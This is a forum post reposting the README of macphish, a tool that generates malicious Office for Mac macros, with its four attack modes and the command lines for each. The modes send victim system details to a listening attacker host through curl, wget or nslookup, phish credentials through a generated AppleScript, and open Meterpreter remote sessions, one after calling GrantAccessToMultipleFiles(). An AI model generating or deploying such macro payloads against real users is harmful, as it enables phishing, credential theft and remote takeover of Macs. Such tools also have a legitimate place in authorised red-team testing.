Nytro Posted September 17, 2017 Report Posted September 17, 2017 macphish Office for Mac Macro Payload Generator Attack vectors There are 4 attack vectors available: beacon creds meterpreter meterpreter-grant For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell. beacon On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is: $./macphish.py -lh <listening host> By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template. creds $./macphish.py -lh <listening host> -lp <listening port> -a creds meterpreter The simplest way of generating a meterpreter payload is: $./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter meterpreter-grant The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first: $./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant For meterpreter attacks, only python payloads are supported at the moment. Sursa: https://github.com/cldrn/macphish Quote